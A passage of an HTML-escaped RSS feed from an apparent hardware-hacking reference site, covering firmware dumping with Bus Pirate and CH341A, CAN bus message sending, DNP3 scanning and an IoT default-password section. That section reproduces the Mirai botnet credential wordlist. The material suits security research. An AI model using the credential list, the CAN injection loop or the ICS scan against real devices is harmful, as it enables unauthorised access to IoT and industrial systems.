class="p"&gt;.&lt;/span&gt;&lt;span class="py"&gt;hex&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="examples" class="anchored-heading"&gt;Examples&lt;a class="heading-anchor" href="#examples" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Dump firmware over SPI using a Bus Pirate&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Identify EEPROM chip&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;flashrom&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;buspirate_spi&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;=/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ttyUSB0&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="c"&gt;# Dump firmware using a bus pirate (SPI)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;sudo&lt;/span&gt; &lt;span class="n"&gt;flashrom&lt;/span&gt; &lt;span class="n"&gt;-p&lt;/span&gt; &lt;span class="n"&gt;Buspirate_spi&lt;/span&gt;&lt;span class="err"&gt;:&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;=/&lt;/span&gt;&lt;span class="n"&gt;dev&lt;/span&gt;&lt;span class="p"&gt;/&lt;/span&gt;&lt;span class="n"&gt;ttyUSB0&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="n"&gt;spispeed&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;&lt;span class="mf"&gt;1M&lt;/span&gt; &lt;span class="n"&gt;-c&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Chip&lt;/span&gt; &lt;span class="n"&gt;name&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="n"&gt;-r&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;Name&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;bin&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="references" class="anchored-heading"&gt;References&lt;a class="heading-anchor" href="#references" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://youtu.be/lP8vMvBu3Bg"&gt;Bus Pirate Unboxing - Toolkit - Hacker Warehouse - 4 juin 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://hardware.buspirate.com/"&gt;Bus Pirate 5 REV 10 Hardware&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://sebastien.andrivet.com/fr/posts/ph0wn-my-first-iot-ctf-part-2/"&gt;Ph0wn, my first IoT CTF - Part 2 - Sebastien Andrivet - 19 December 2018&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://trustedsec.com/blog/hardware-hacking-plunder-with-a-bus-pirate"&gt;Hardware Hacking: Plunder With a Bus Pirate - Brian Berg - February 15, 2024&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>CAN - Controller Area Network</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/can/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/can/</guid><description>&lt;p&gt;The Controller Area Network (CAN) bus is a high-integrity serial communication protocol designed for real-time data exchange in embedded systems, particularly in automotive and industrial applications. It operates on a multi-master, message-oriented architecture, allowing multiple devices (nodes) to communicate on the same network without a central controller.&lt;/p&gt;
&lt;h2 id="interact" class="anchored-heading"&gt;Interact&lt;a class="heading-anchor" href="#interact" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-ps1" data-lang="ps1"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;pip&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;python-can&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;pip&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="nb"&gt;python-can&lt;/span&gt;&lt;span class="n"&gt;-utils&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-py" data-lang="py"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;can&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;bus&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;can&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Bus&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="kc"&gt;True&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;msg&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;can&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;Message&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;3&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;_&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;8&lt;/span&gt;&lt;span class="p"&gt;)])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt; &lt;span class="n"&gt;bus&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;send&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;msg&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/Tbruno25/can-explorer"&gt;Tbruno25/can-explorer&lt;/a&gt; - Visualize CAN Bus messages in real time&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="uds" class="anchored-heading"&gt;UDS&lt;a class="heading-anchor" href="#uds" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;blockquote&gt;
&lt;p&gt;Unified Diagnostic Services (UDS) is a communication protocol used in automotive Electronic Control Units (ECUs) to enable diagnostics, firmware updates, routine testing and more.&lt;/p&gt;</description></item><item><title>CH341A</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/ch341a/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/ch341a/</guid><description>&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/ch341a.png" alt="CH341A" width="871" height="819" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;CH341A&lt;/figcaption&gt;&lt;/figure&gt;&lt;h2 id="dump-spi-flash" class="anchored-heading"&gt;Dump SPI flash&lt;a class="heading-anchor" href="#dump-spi-flash" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="ch341eeprom" class="anchored-heading"&gt;ch341eeprom&lt;a class="heading-anchor" href="#ch341eeprom" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;a href="https://github.com/plumbum/ch341eeprom"&gt;plumbum/ch341eeprom&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo apt install git make libusb-1.0-0-dev clang
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;git clone https://github.com/plumbum/ch341eeprom.git
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;make
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;./ch341eeprom -v -s 24c05 -r dump.bin
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="flashrom" class="anchored-heading"&gt;Flashrom&lt;a class="heading-anchor" href="#flashrom" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo flashrom -V --programmer ch341a_spi -r dump.bin
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;sudo flashrom -V --programmer ch341a_spi -r dump.bin -c W25Q16.V &lt;span class="c1"&gt;# Specify the chip&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>Chip identification</title><link>https://bokkapig.pages.dev/refs/hardware/enumeration/chip-identification/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/enumeration/chip-identification/</guid><description>&lt;ul&gt;
&lt;li&gt;Google Dork: &lt;code&gt;filetype:pdf &amp;lt;reference number&amp;gt;&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://datasheetspdf.com"&gt;datasheetspdf.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.alldatasheet.com"&gt;alldatasheet.com&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.datasheets360.com"&gt;datasheets360.com&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="emrf-shield" class="anchored-heading"&gt;EM/RF shield&lt;a class="heading-anchor" href="#emrf-shield" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Electromagnetic/Radio Frequency Shield should be removed to see what it is hidding.&lt;/p&gt;</description></item><item><title>Default IoT Passwords</title><link>https://bokkapig.pages.dev/refs/hardware/other/default-iot-passwords/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/other/default-iot-passwords/</guid><description>&lt;p&gt;IoT Device Default Password Lookup : &lt;a href="https://www.defpass.com"&gt;defpass.com&lt;/a&gt;&lt;/p&gt;
&lt;h2 id="mirai-wordlist" class="anchored-heading"&gt;Mirai Wordlist&lt;a class="heading-anchor" href="#mirai-wordlist" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;Seclist Mirai Wordlist : &lt;a href="https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Malware/mirai-botnet.txt"&gt;danielmiessler/SecLists/master/Passwords/Malware/mirai-botnet.txt&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;xc3511&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;vizxv&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="mf"&gt;888888&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;xmhdipc&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;jauntech&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="mf"&gt;123456&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="mf"&gt;54321&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;support&lt;/span&gt; &lt;span class="n"&gt;support&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;none&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;root&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="mf"&gt;12345&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;user&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;none&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;admin1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="mf"&gt;1111&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;smcadmin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="mf"&gt;1111&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="mf"&gt;666666&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="mf"&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;klv123&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;Administrator&lt;/span&gt; &lt;span class="n"&gt;admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;service&lt;/span&gt; &lt;span class="n"&gt;service&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;supervisor&lt;/span&gt; &lt;span class="n"&gt;supervisor&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;guest&lt;/span&gt; &lt;span class="n"&gt;guest&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;guest&lt;/span&gt; &lt;span class="mf"&gt;12345&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin1&lt;/span&gt; &lt;span class="n"&gt;password&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;administrator&lt;/span&gt; &lt;span class="mf"&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mf"&gt;666666&lt;/span&gt; &lt;span class="mf"&gt;666666&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="mf"&gt;888888&lt;/span&gt; &lt;span class="mf"&gt;888888&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;ubnt&lt;/span&gt; &lt;span class="n"&gt;ubnt&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;klv1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;Zte521&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;hi3518&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;jvbzd&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;anko&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;zlxx&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;7ujMko0vizxv&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;7ujMko0admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;system&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;ikwb&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;dreambox&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;user&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="n"&gt;realtek&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;root&lt;/span&gt; &lt;span class="mf"&gt;000000&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="mf"&gt;1111111&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="mf"&gt;1234&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="mf"&gt;12345&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="mf"&gt;54321&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="mf"&gt;123456&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;7ujMko0admin&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;pass&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;admin&lt;/span&gt; &lt;span class="n"&gt;meinsm&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;tech&lt;/span&gt; &lt;span class="n"&gt;tech&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;&lt;span class="n"&gt;mother&lt;/span&gt; &lt;span class="n"&gt;fucker&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;</description></item><item><title>DNP3 - Distributed Network Protocol</title><link>https://bokkapig.pages.dev/refs/hardware/protocols/dnp3/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/protocols/dnp3/</guid><description>&lt;h2 id="discovery" class="anchored-heading"&gt;Discovery&lt;a class="heading-anchor" href="#discovery" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;DNP3 Clients&lt;/strong&gt;&lt;/em&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://sourceforge.net/projects/dnp3-client-master-simulator/"&gt;DNP3 Client Master Simulator&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://github.com/dnp3/dnp3-simulator"&gt;DNP3 Simulator&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;DNP3 Nmap Script&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;Source: &lt;a href="https://github.com/Z-0ne/ICS-Discovery-Tools/blob/master/dnp3-enumerate.nse"&gt;dnp3-enumerate.nse&lt;/a&gt;&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" class="chroma"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span class="line"&gt;&lt;span class="cl"&gt;nmap -sT --script dnp3-enumerate.nse -p &lt;span class="m"&gt;20000&lt;/span&gt; &amp;lt;target_ip&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="traffic-generation" class="anchored-heading"&gt;Traffic Generation&lt;a class="heading-anchor" href="#traffic-generation" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://github.com/hpcn-uam/DNP3Crafter"&gt;DNP3 Crafter&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;</description></item><item><title>Electronic Components</title><link>https://bokkapig.pages.dev/refs/hardware/other/electronic-components/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/other/electronic-components/</guid><description>&lt;h2 id="resistors" class="anchored-heading"&gt;Resistors&lt;a class="heading-anchor" href="#resistors" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h2 id="capacitors" class="anchored-heading"&gt;Capacitors&lt;a class="heading-anchor" href="#capacitors" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h2 id="transistors" class="anchored-heading"&gt;Transistors&lt;a class="heading-anchor" href="#transistors" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h2 id="inductors" class="anchored-heading"&gt;Inductors&lt;a class="heading-anchor" href="#inductors" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h2 id="integrated-circuit-ic-microchip" class="anchored-heading"&gt;Integrated Circuit (IC) microchip&lt;a class="heading-anchor" href="#integrated-circuit-ic-microchip" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h2&gt;
&lt;h3 id="microcontroller-unit-mcu" class="anchored-heading"&gt;Microcontroller Unit (MCU)&lt;a class="heading-anchor" href="#microcontroller-unit-mcu" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;h3 id="system-on-chip-soc" class="anchored-heading"&gt;System-on-Chip (SoC)&lt;a class="heading-anchor" href="#system-on-chip-soc" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;
&lt;h3 id="trusted-platform-module-tpm" class="anchored-heading"&gt;Trusted Platform Module (TPM)&lt;a class="heading-anchor" href="#trusted-platform-module-tpm" aria-label="Permalink to this section"&gt;#&lt;/a&gt;
&lt;/h3&gt;</description></item><item><title>ESP32</title><link>https://bokkapig.pages.dev/refs/hardware/gadgets/esp32/</link><pubDate>Sun, 12 Jul 2026 22:01:52 +0200</pubDate><guid>https://bokkapig.pages.dev/refs/hardware/gadgets/esp32/</guid><description>&lt;figure class="writeup-figure"&gt;
 &lt;img src="https://bokkapig.pages.dev/refs/hardware/assets/esp32-pinout.png" alt="ESP32" width="727" height="508" loading="lazy" decoding="async"&gt;&lt;figcaption&gt;ESP32&lt;/figcaption&gt;&lt;/figure&gt;&lt;ul&gt;
